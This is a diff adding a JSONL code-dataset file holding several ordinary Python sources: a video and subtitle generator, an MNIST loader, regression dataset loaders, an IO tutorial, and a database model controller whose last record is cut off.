diff --git "a/6632.jsonl" "b/6632.jsonl" new file mode 100644--- /dev/null +++ "b/6632.jsonl" @@ -0,0 +1,742 @@ +{"seq_id":"130525568","text":"import moviepy.editor as mpy\n\nimport pydub as pdb\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import cv2\n\nimport moviepy.video.fx.all as vfx\n\nfrom collections import defaultdict\n\nimport moviepy.video.fx.all as vfx\nimport os\n\n# CONSTANTS\nPREVIEW_SIZE = (1280, 720)\n#PRODUCTION_SIZE = (1024, 768)\n\ndef resize_and_fit(origin_clip, video_size):\n new_size = (0, 0) # init the value\n if origin_clip.h / origin_clip.w > PREVIEW_SIZE[1] / PREVIEW_SIZE[0]: # EH: when the image is square, change it according to video size\n new_size = ((origin_clip.w * video_size[1] / origin_clip.h),video_size[1])\n else:\n new_size = ((video_size[0], origin_clip.h * video_size[0] / origin_clip.w))\n clip = origin_clip.resize(new_size).on_color(video_size)\n return clip\n\ndef set_scene_dur(origin_clip, dur, fps=25):\n clip = origin_clip.set_duration(dur).set_fps(fps)\n return clip\n\ndef set_img_dur(origin_clip, dur, fps=25):\n clip = origin_clip.set_duration(dur).set_fps(fps)\n return clip\n\ndef set_video_dur(origin_clip, dur, fps=25):\n clip = vfx.speedx(origin_clip, final_duration=dur).set_fps(fps)\n return clip\n\ndef generate_subtitles_clip(subtitles, fontsize=60, color=\"white\", stroke_width=2, stroke_color=\"black\"):\n '''\n params:\n * subtitles: parse script\n '''\n text_clips = []\n \n for content in subtitles:\n if isinstance(content, SContent):\n text_content = mpy.TextClip(content.text,\n color=color,\n stroke_color= stroke_color,\n stroke_width= stroke_width,\n font=\"ArialUnicode\", # TODO: change the font\n fontsize=fontsize\n )\n text_on_color = text_content.on_color(PREVIEW_SIZE, pos=('center', 'bottom') ,col_opacity=0)\n text_clip = text_on_color.set_duration(content.dur)\n text_clips.append(text_clip)\n # EH: add some spaces between subtitles\n \n return mpy.concatenate_videoclips(text_clips)\n\n\nclass SCommand():\n \n def __init__(self, command_str):\n self.command_str = command_str\n self.command_parsed = defaultdict(list)\n self.parse()\n \n def parse(self):\n command_factors = self.command_str.split()\n command_factors = [factor for factor in command_factors if factor] # Clean blank lines\n \n param_name = \"position_args\"\n\n for i in range(len(command_factors)):\n factor = command_factors[i]\n if i == 0:\n self.command_parsed['func'] = factor\n elif factor[0:2] == \"--\":\n param_name = factor[2:]\n else:\n # Append the param\n if factor.replace(\".\", \"\", 1).isdigit(): # check if it is float\n factor = float(factor)\n elif \":\" in factor:\n if factor.count(\":\") == 1: # if hour is forgot to be written\n if len(factor.split(\":\")[0]) == 1: # if 0 is forgot to be written\n factor = \"00:0\" + factor\n else:\n factor = \"00:\" + factor\n\n self.command_parsed[param_name].append(factor)\n\nclass SContent():\n \n def __init__(self, text, audio=0, dur=1.5):\n self.text = text\n self.audio = audio\n self.dur = dur # EH: adjust the dur according to audio\n\n # EH: change a position to set the text\n if len(self.text) > 18:\n self.text = text[:12] + \"\\n\" + text[12:]\n\ndef parse_script(script):\n script_lines = [line for line in script.split(\"\\n\") if line]\n \n parsed = []\n for line in script_lines:\n if line[0] == \"$\":\n parsed.append(SCommand(line[1:]))\n else:\n parsed.append(SContent(line))\n return parsed\n\ndef get_scene_transition_schedule(parsed_script):\n # EH: change this into index based method. This method is too ugly.\n '''\n return: a list of tuples like (scene_filename, dur, params)\n '''\n\n schedule = []\n \n current_scene = \"\"\n dur = 0\n params = {}\n \n for line in parsed_script:\n if isinstance(line, SCommand):\n \n if line.command_parsed[\"func\"] == \"ST\":\n if current_scene: # If 'line' is not the first scene, append the previous scene\n schedule.append((current_scene, dur, params))\n current_scene = line.command_parsed[\"position_args\"][0]\n dur = 0\n # EH: change the way params are added\n params = {\"part\": line.command_parsed['part'], \"crop\": line.command_parsed['crop']}\n else:\n if isinstance(line, SContent):\n dur += line.dur\n \n # Add the final scene after all lines are schedule\n schedule.append((current_scene, dur, params))\n \n return schedule\n\ndef scheduled_time_scene_transition(schedule, resource_folder_name=\"res\"):\n '''\n params:\n - schedule: a list of tuples of (file name, dur)\n '''\n clips = []\n print(schedule)#DEBUG\n for res, dur, params in schedule:\n # EH: use a better way to detect the type of a file\n file_name = os.path.join(resource_folder_name, res)\n if not os.path.exists(file_name):\n print(\"File not found! {}\".format(file_name))\n raise FileNotFoundError()\n file_type = res.split(\".\")[-1]\n if file_type in [\"mov\", \"mp4\", \"avi\", \"flv\"]:\n origin_video_clip = mpy.VideoFileClip(os.path.join(resource_folder_name, res), audio=False)\n if params[\"part\"]:\n #print(params[\"part\"])\n parts = params[\"part\"]\n origin_video_clip = origin_video_clip.subclip(parts[0], parts[1])\n if params[\"crop\"]:\n w = origin_video_clip.w\n h = origin_video_clip.h\n rect = params[\"crop\"]\n origin_video_clip = vfx.crop(origin_video_clip, w*rect[0], h*rect[1], w*rect[2], h*rect[3])\n clips.append(set_video_dur(resize_and_fit(origin_video_clip, PREVIEW_SIZE), dur))\n elif file_type in [\"jpg\", \"png\", \"jpeg\"]:\n origin_img_clip = mpy.ImageClip(os.path.join(resource_folder_name, res))\n if params[\"crop\"]:\n w = origin_img_clip.w\n h = origin_img_clip.h\n rect = params[\"crop\"]\n #print(\"Crop\", w, h, rect, rect[0]*w)\n origin_img_clip = vfx.crop(origin_img_clip, w*rect[0], h*rect[1], w*rect[2], h*rect[3])\n clips.append(set_img_dur(resize_and_fit(origin_img_clip, PREVIEW_SIZE), dur))\n elif file_type in [\"txt\"]:\n print(res)\n print(os.path.join(resource_folder_name, res))\n origin_txt_clip = mpy.TextClip(\n open(os.path.join(resource_folder_name, res)).read(),\n color=\"white\",\n font=\"ArialUnicode\",\n fontsize=100\n ).on_color(PREVIEW_SIZE).set_position(\"center\")\n clips.append(set_scene_dur(resize_and_fit(origin_txt_clip, PREVIEW_SIZE), dur))\n \n return mpy.concatenate_videoclips(clips)\n\ndef get_chunks(audio):\n chunks = pdb.silence.split_on_silence(audio.normalize(), min_silence_len=1000, silence_thresh=-40, keep_silence=250)\n\n new_chunks = []\n for chunk in chunks:\n dur = round(chunk.duration_seconds, 1) + 0.1\n new_chunk = (chunk + pdb.AudioSegment.silent())[:dur*1000]\n new_chunks.append(new_chunk)\n return new_chunks\n\ndef match_audio(parsed_script, chunks):\n \n # EH: normalize the volume of audio at first and then divide it into chunks\n \n for line in parsed_script:\n if isinstance(line, SContent) and chunks:\n line.audio = chunks.pop(0) # Get the main audio before chunks are removed\n line.dur = line.audio.duration_seconds\n\ndef generate_video():\n\n # Parse script\n script = \"\"\n with open(\"script.txt\", \"r\") as f:\n script = f.read()\n\n parsed_script = parse_script(script)\n print(\"Script parsed.\")\n\n # Generate audio\n if \"audio.wav\" in os.listdir(\".\"):\n print(\"Audio detected.\")\n chunks = get_chunks(pdb.AudioSegment.from_wav(\"audio.wav\"))\n print(\"Audio chunks generated.\")\n sum(chunks).export(\"audio_track.wav\", \"wav\")\n # Export to file first, then match\n match_audio(parsed_script, chunks)\n \n # Generate subtitles\n subtitle_clip = generate_subtitles_clip(parsed_script)\n print(\"Subtitles generated.\")\n\n # Generate scenes\n schedule = get_scene_transition_schedule(parsed_script)\n video_clip = scheduled_time_scene_transition(schedule)\n print(\"Scene generated.\")\n\n # Generate the video\n main_clip = mpy.CompositeVideoClip([video_clip, subtitle_clip])\n\n # Add the audio track\n if \"audio_track.wav\" in os.listdir(\".\"):\n audio_clip = mpy.AudioFileClip('audio_track.wav')\n if \"BGM.mp3\" in os.listdir(\".\") or \"BGM.flac\" in os.listdir(\".\"):\n audio_clip = mpy.CompositeAudioClip([mpy.AudioFileClip('audio_track.wav'), mpy.AudioFileClip(\"BGM.mp3\").volumex(0.15)])\n main_clip = main_clip.set_audio(audio_clip.set_duration(main_clip.duration))\n\n # Write the video\n main_clip.write_videofile(\"output.mp4\")\n\nif __name__ == \"__main__\":\n generate_video()\n\n","sub_path":"svmaker.py","file_name":"svmaker.py","file_ext":"py","file_size_in_byte":9524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83993009","text":"import os\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom PIL import Image\n\nclass MNIST_data(Dataset):\n def __init__(self, main_dir=\"data\", labels=list(range(10))):\n super(MNIST_data, self).__init__()\n self.main_dir = main_dir\n self.all_folders = [main_dir+\"/{}/\".format(i) for i in range(10)]\n self.all_imgs = []\n for i in labels:\n self.all_imgs += map(lambda bla: self.all_folders[i]+bla, os.listdir(self.all_folders[i]))\n self.num_classes = len(labels)\n \n def __len__(self):\n return len(self.all_imgs)\n\n def __getitem__(self, idx):\n imgloc = self.all_imgs[idx]\n label = int(imgloc.split(\"/\")[-2])\n img = Image.open(imgloc).convert(\"L\") # L ist ein Concept Mode: https://pillow.readthedocs.io/en/stable/handbook/concepts.html#concept-modes\n img = transforms.ToTensor()(img)\n return {\"image\": img, \"label\": label}\n #img = torch.tensor(list(Image.open(imgloc)), dtype=torch.float)\n #return img\n ","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473909652","text":"import csv\nemail = []\nwith open('faculty.csv', 'r') as file:\n reader = csv.DictReader(file)\n for row in reader:\n email.append(row[' email'])\nwith open('emails.csv', 'w') as newfile:\n for i in email:\n newfile.write(str(i) + '\\n')\n ","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167868493","text":"import numpy as np\nimport pandas as pd\n\nfrom mldb._io import read_csv_data, read_xls_data, read_arff_data, construct_return_set, references\n\n__all__= ['load_airfoil',\n 'load_cpu_performance',\n 'load_forestfires',\n 'load_real_estate_valuation',\n 'load_residential_building',\n 'load_slump_test',\n 'load_stock_portfolio_performance',\n 'load_winequality_red',\n 'load_winequality_white',\n 'load_yacht_hydrodynamics',\n 'load_ccpp',\n 'load_communities',\n 'load_diabetes',\n 'load_laser',\n 'load_autoMPG6',\n 'load_wizmir',\n 'load_wankara',\n 'load_mortgage',\n 'load_baseball',\n 'load_ele_1',\n 'load_treasury',\n 'load_compactiv',\n 'load_puma32h',\n 'summary',\n 'generate_summary_table',\n 'get_filtered_data_loaders',\n 'get_data_loaders',\n 'get_references']\n\ndef get_references():\n return references\n\ndef load_airfoil(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/airfoil/airfoil_self_noise.dat.txt', sep= '\\t')\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"airfoil\", return_X_y, encode, citation= 'uci', name= \"airfoil\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_cpu_performance(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/cpu_performance/machine.data.txt', sep= ',')\n del db[db.columns[-1]]\n del db[db.columns[1]]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"cpu_performance\", return_X_y, encode, citation= 'uci', name= \"cpu_performance\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_forestfires(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/forestfires/forestfires.csv', sep= ',', header=0)\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"forestfires\", return_X_y, encode, citation= 'uci', name= \"forestfires\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_real_estate_valuation(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_xls_data('data/regression/real_estate_valuation/Real estate valuation data set.xlsx')\n del db[db.columns[0]]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n for c in db.columns:\n db[c]= db[c].astype(float)\n \n return construct_return_set(db, \"real_estate_valuation\", return_X_y, encode, citation= 'uci', name= \"real_estate_valuation\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_residential_building(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n # target: V9\n \n db= read_xls_data('data/regression/residential_building/Residential-Building-Data-Set.xlsx')\n db= db.drop(0, axis='index')\n db.reset_index(drop=True, inplace=True)\n del db[db.columns[-1]]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n for c in db.columns:\n db[c]= db[c].astype(float)\n \n return construct_return_set(db, \"residential_building\", return_X_y, encode, citation= 'uci', name= \"residential_building\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_slump_test(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/slump_test/slump_test.data.txt', sep= ',', header=0)\n del db[db.columns[0]]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"slump_test\", return_X_y, encode, citation= 'uci', name= \"slump_test\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_stock_portfolio_performance(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n # target: normalized annual return\n \n db= read_xls_data('data/regression/stock_portfolio_performance/stock portfolio performance data set.xlsx', sheet_name='all period')\n db.columns= db.iloc[0].values\n db= db.drop(db.index[0], axis='index')\n db.reset_index(drop=True, inplace=True)\n del db[db.columns[0]]\n columns= list(db.columns[0:5]) + [db.columns[11]]\n db= db[columns]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n for c in db.columns:\n db[c]= db[c].astype(float)\n \n return construct_return_set(db, \"stock_portfolio_performance\", return_X_y, encode, citation= 'uci', name= \"stock_portfolio_performance\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_winequality_red(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/winequality_red/winequality-red.csv', sep= ';', header=0)\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"winequality_red\", return_X_y, encode, citation= 'uci', name= \"winequality_red\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_winequality_white(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/winequality_white/winequality-white.csv', sep= ';', header=0)\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"winequality_white\", return_X_y, encode, citation= 'uci', name= \"winequality_white\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_yacht_hydrodynamics(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/yacht_hydrodynamics/yacht_hydrodynamics.data.txt', sep= None, header=0, delim_whitespace=True)\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"yacht_hydrodynamics\", return_X_y, encode, citation= 'uci', name= \"yacht_hydrodynamics\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_ccpp(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_xls_data('data/regression/ccpp/Folds5x2_pp.xlsx', sheet_name='Sheet1')\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"ccpp\", return_X_y, encode, citation= 'uci', name= \"ccpp\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_communities(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/communities/communities.data', sep= ',')\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"communities\", return_X_y, encode, citation= 'uci', name= \"communities\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_diabetes(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/diabetes/diabetes.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"diabetes\", return_X_y, encode, citation= 'keel', name= \"diabetes\", verbose= verbose, problem_type= 'regression')\n\ndef load_laser(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/laser/laser.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"laser\", return_X_y, encode, citation= 'keel', name= \"laser\", verbose= verbose, problem_type= 'regression')\n\ndef load_autoMPG6(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/autoMPG6/autoMPG6.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"autoMPG6\", return_X_y, encode, citation= 'keel', name= \"autoMPG6\", verbose= verbose, problem_type= 'regression')\n\ndef load_wizmir(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/wizmir/wizmir.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"wizmir\", return_X_y, encode, citation= 'keel', name= \"wizmir\", verbose= verbose, problem_type= 'regression')\n\ndef load_wankara(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/wankara/wankara.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"wankara\", return_X_y, encode, citation= 'keel', name= \"wankara\", verbose= verbose, problem_type= 'regression')\n\ndef load_mortgage(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/mortgage/mortgage.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"mortgage\", return_X_y, encode, citation= 'keel', name= \"mortgage\", verbose= verbose, problem_type= 'regression')\n\ndef load_baseball(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/baseball/baseball.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"baseball\", return_X_y, encode, citation= 'keel', name= \"baseball\", verbose= verbose, problem_type= 'regression')\n\ndef load_ele_1(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/ele_1/ele-1.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"ele_1\", return_X_y, encode, citation= 'keel', name= \"ele_1\", verbose= verbose, problem_type= 'regression')\n\ndef load_treasury(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/treasury/treasury.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"treasury\", return_X_y, encode, citation= 'keel', name= \"treasury\", verbose= verbose, problem_type= 'regression')\n\ndef load_compactiv(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/compactiv/compactiv.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"compactiv\", return_X_y, encode, citation= 'keel', name= \"compactiv\", verbose= verbose, problem_type= 'regression')\n\ndef load_puma32h(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/puma32h/puma32h.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"puma32h\", return_X_y, encode, citation= 'keel', name= \"puma32h\", verbose= verbose, problem_type= 'regression')\n\ndef generate_summary():\n results= []\n \n for func_name in __all__:\n if func_name.startswith('load_'):\n data_encoded= globals()[func_name](return_X_y= False, encode= True)\n \n result= {'loader_function': globals()[func_name],\n 'name': data_encoded['name'],\n 'n': len(data_encoded['data']),\n 'n_attr_raw': len(data_encoded['data_raw'][0]),\n 'n_attr_encoded': len(data_encoded['data'][0])}\n \n result['reference_key']= data_encoded['citation']\n \n results.append(result)\n \n df_results= pd.DataFrame(results)\n\n return df_results\n\ndef summary():\n summary_df= pd.DataFrame(summary_table.copy(), columns=summary_columns)\n summary_df['loader_function']= summary_df['loader_function'].apply(lambda x: globals()[x])\n return summary_df\n\ndef generate_summary_table():\n results= generate_summary()\n results['loader_function']= results['loader_function'].apply(lambda x: x.__name__)\n\n return results.columns, results.values\n\ndef get_filtered_data_loaders(n_attr_encoded_bounds= [1, 5000],\n n_attr_raw_bounds= [1, 5000],\n n_bounds= [1, 10000]):\n descriptors= summary()\n return descriptors[(descriptors['n'] >= n_bounds[0]) & (descriptors['n'] < n_bounds[1]) & \n (descriptors['n_attr_encoded'] >= n_attr_encoded_bounds[0]) & (descriptors['n_attr_encoded'] < n_attr_encoded_bounds[1]) & \n (descriptors['n_attr_raw'] >= n_attr_raw_bounds[0]) & (descriptors['n_attr_raw'] < n_attr_raw_bounds[1])]['loader_function'].values\n\ndef get_data_loaders(subset='all'):\n \"\"\"\n Args:\n subset (str): 'all'/'study'/'small'/'tiny'\n \"\"\"\n \n n_attr_encoded_bounds= [1, 5000]\n n_attr_raw_bounds= [1, 5000]\n n_bounds= [1, 10000]\n \n if subset == 'study':\n n_attr_encoded_bounds[1]= 100\n n_bounds[1]= 4000\n elif subset == 'small':\n n_attr_encoded_bounds[1]= 100\n n_bounds[1]= 1000\n elif subset == 'tiny':\n n_bounds[1]= 120\n \n return get_filtered_data_loaders(n_attr_encoded_bounds= n_attr_encoded_bounds,\n n_attr_raw_bounds= n_attr_raw_bounds,\n n_bounds= n_bounds)\n\nsummary_table= np.array([\n ['load_airfoil', 1503, 5, 5, 'airfoil', 'uci'],\n ['load_cpu_performance', 209, 7, 7, 'cpu_performance', 'uci'],\n ['load_forestfires', 517, 18, 12, 'forestfires', 'uci'],\n ['load_real_estate_valuation', 414, 6, 6, 'real_estate_valuation', 'uci'],\n ['load_residential_building', 372, 107, 107, 'residential_building', 'uci'],\n ['load_slump_test', 103, 9, 9, 'slump_test', 'uci'],\n ['load_stock_portfolio_performance', 63, 6, 6, 'stock_portfolio_performance', 'uci'],\n ['load_winequality_red', 1599, 11, 11, 'winequality_red', 'uci'],\n ['load_winequality_white', 4898, 11, 11, 'winequality_white', 'uci'],\n ['load_yacht_hydrodynamics', 307, 6, 6, 'yacht_hydrodynamics', 'uci'],\n ['load_ccpp', 9568, 4, 4, 'ccpp', 'uci'],\n ['load_communities', 1994, 154, 127, 'communities', 'uci'],\n ['load_diabetes', 43, 2, 2, 'diabetes', 'keel'],\n ['load_laser', 993, 4, 4, 'laser', 'keel'],\n ['load_autoMPG6', 392, 5, 5, 'autoMPG6', 'keel'],\n ['load_wizmir', 1461, 9, 9, 'wizmir', 'keel'],\n ['load_wankara', 321, 9, 9, 'wankara', 'keel'],\n ['load_mortgage', 1049, 15, 15, 'mortgage', 'keel'],\n ['load_baseball', 337, 16, 16, 'baseball', 'keel'],\n ['load_ele_1', 495, 2, 2, 'ele_1', 'keel'],\n ['load_treasury', 1049, 15, 15, 'treasury', 'keel'],\n ['load_compactiv', 8192, 21, 21, 'compactiv', 'keel'],\n ['load_puma32h', 8192, 32, 32, 'puma32h', 'keel']], dtype=object)\n\nsummary_columns= ['loader_function', 'n', 'n_attr_encoded', 'n_attr_raw', 'name',\n 'reference_key']","sub_path":"mldb/regression/_regression.py","file_name":"_regression.py","file_ext":"py","file_size_in_byte":15781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"406332790","text":"# IO操作\n\n# 读文件 open():传入文件名和标识符'r':表示读\nf = open('/Users/dong/PythonBasis/hello.py', 'r') # 如果文件不存在,open()会抛出IOError的错误(FileNotFoundError)\ncontent = f.read()\nf.close() # 文件打开使用完之后, 必须关闭, 避免占用资源\nprint(content) # f.read() 将文件中的内容读取出来\n\n\nwith open('/Users/dong/PythonBasis/hello.py', 'r') as file: # 利用with..as..来自动关闭\n for line in file.readlines():\n print(line.strip())\n\n# f = open('/Users/michael/test.jpg', 'rb') # 'rb':读取二进制文件\n#\n# f = open('/Users/michael/gbk.txt', 'r', encoding='gbk') # 读取非UTF-8的文件 需要在后面添加文件的编码\n#\n#\n# f = open('/Users/michael/test.txt', 'w') # 'w':写文件\n# f.write('Hello, world!')\n# f.close()\n\n\n# with open('/Users/michael/test.txt', 'w') as f:\n# f.write('Hello, world!')\n\nprint('*****************************************')\n# StringIO:在内存中读写字符串\nfrom io import StringIO\nf = StringIO()\nf.write(\"hello\")\nprint('write:' + f.getvalue()) # 通过getvalue()来读取内存中的字符串\n\nf2 = StringIO('hello\\nHi\\nGoodBye')\nwhile True:\n s = f2.readline()\n if s == '':\n break\n print(s)\n\n\n# BytesIO: 操作二进制文件 StringIO只能操作字符串\nfrom io import BytesIO\nb = BytesIO()\nb.write('中文'.encode('utf-8'))\nprint(b.getvalue())\n\nb2 = BytesIO(b'\\xe4\\xb8\\xad\\xe6\\x96\\x87')\nprint(b2.getvalue())\nprint(b2.read())\n","sub_path":"learn4.py","file_name":"learn4.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"205850908","text":"#!/usr/bin/env python3\n\"\"\"Classes that hold models for dynamic database swapping.\nThese models are controllers for adding, updating, and deleting from db.\n\"\"\"\nfrom difflib import SequenceMatcher as SM\nimport utils.models as db\nimport concurrent.futures\nimport ui.settings as s\nimport utils.formatter as fm\n\n\nclass ModelCtrl:\n \"\"\"Controls all model's create, update, and delete methods\"\"\"\n def __init__(self):\n \"\"\"Switch to another db by overwriting this class by initing\n it again.\n \"\"\"\n self.page = db.Page\n self.cont = db.Content\n self.tag = db.Tag\n self.dd_info = db.DatabaseInfo\n #self.rel = db.Relations\n\n def add_page(self, data:dict) -> dict:\n \"\"\"Args:\n data: keys are name, notes, img_path, img_title\n Returns:\n res: contains Page model obj and a message for display\n \"\"\"\n p = self.page.create(\n name = data[\"name\"].title().rstrip(),\n notes = fm.format_note(data[\"notes\"]),\n img_path = \"\",\n img_title = \"\"\n )\n p.save()\n return p\n\n def add_content(self, data:dict, target):\n \"\"\"Args:\n data: {idx: {title: content}, ...}\n target: s.TARGET_PAGE\n \"\"\"\n for k, v in data.items():\n res = self.cont.create(\n page = target,\n title = v[\"title\"].title().rstrip(),\n idx = k,\n content = fm.format_content(v[\"cont\"]),\n content_img = \"\",\n content_img_title = \"\"\n )\n res.save()\n\n def update_page(self, target_name, data):\n \"\"\"Data keys: name, notes\"\"\"\n q = None\n if data[\"name\"] != \"\" and data[\"notes\"] != \"\":\n q = (db.Page.update(name=data[\"name\"], notes=fm.format_note(\n data[\"notes\"])).where(db.Page.name==target_name))\n q.execute()\n elif data[\"name\"] != \"\":\n q = (db.Page.update(name=data[\"name\"].title().rstrip()).\n where(db.Page.name==target_name))\n q.execute()\n else:\n q = (db.Page.update(notes=fm.format_note(data[\"notes\"])).\n where(db.Page.name==target_name))\n q.execute()\n return q\n\n def update_content(self, target_page, data):\n \"\"\"data keys: title, idx, content\n TODO: implement idx swapping\n \"\"\"\n q = None\n if data.get(\"title\", \"\") != \"\":\n q = (db.Content.update(title=data[\"title\"].title().rstrip()).\n where(db.Content.page==target_page,\n db.Content.idx==data[\"idx\"]))\n q.execute()\n else:\n q = (db.Content.update(content=fm.format_content(data[\"content\"])).\n where(db.Content.page==target_page,\n db.Content.idx==data[\"idx\"]))\n q.execute()\n return q\n\n def delete_page(self, name):\n d = self.page.delete().where(self.page.name==name)\n d.execute()\n\n def delete_content(self, page_obj):\n d = self.cont.delete().where(self.cont.page==page_obj)\n d.execute()\n\n def set_tag(self, new:str) -> str:\n \"\"\"`new` should be just the tag without commas.\"\"\"\n q = self.d_info.select()[0] # Only 1 column should exist\n res = f\"{q.set_tags},{new}\"\n save = (self.d_info.update({self.d_info.set_tags:res}).where(self.d_info.id==1))\n return f\"Made new tag {new}\"\n\nclass Query:\n def __init__(self):\n self.tag = db.Tag\n self.page = db.Page\n self.content = db.Content\n #self.rel = db.Relations\n\n def page_amt_stats(self):\n q = self.page.select()\n return len(q)\n\n def pages(self, name):\n q = self.page.select().where(self.page.name==name)\n return q\n\n def page_content(self, target):\n \"\"\"Args:\n target: s.TARGET_PAGE\n \"\"\"\n q = self.content.select().where(self.content.page==target)\n return q\n\n def full_page_match(self, name) -> list:\n p = self.page.select().where(self.page.name==name)\n if len(p) == 1:\n return p\n return []\n\n def fuzzy_percentage(self, query, target):\n return SM(None, target, query).ratio()\n\n def fuzzy_loopy(self, name, limit, tolerance) -> list:\n \"\"\"iterator method needed for less mem usage\"\"\"\n res = []\n maximum = 0\n for p in self.page.select().iterator():\n perc = self.fuzzy_percentage(p.name, name)\n if len(res) >= limit:\n break\n if perc > tolerance:\n if perc > maximum:\n maximum = perc\n res.insert(0, p)\n else:\n res.append(p)\n return res\n\n def fuzzy_page_match(self, name, pg_limit) -> list:\n limit = int(pg_limit * 1.5)\n args = [(name, limit, s.FUZZY_HI_TOLERANCE),\n (name, limit, s.FUZZY_LO_TOLERANCE)]\n with concurrent.futures.ThreadPoolExecutor() as executor:\n results = [executor.submit(self.fuzzy_loopy, n, lim, tol)\n for n, lim, tol in args]\n if results[0].result() == []:\n return results[1].result()\n return results[0].result()\n\n def suggestions_match(self, name) -> list:\n res = []\n maximum = 0\n for p in self.page.select().iterator():\n perc = 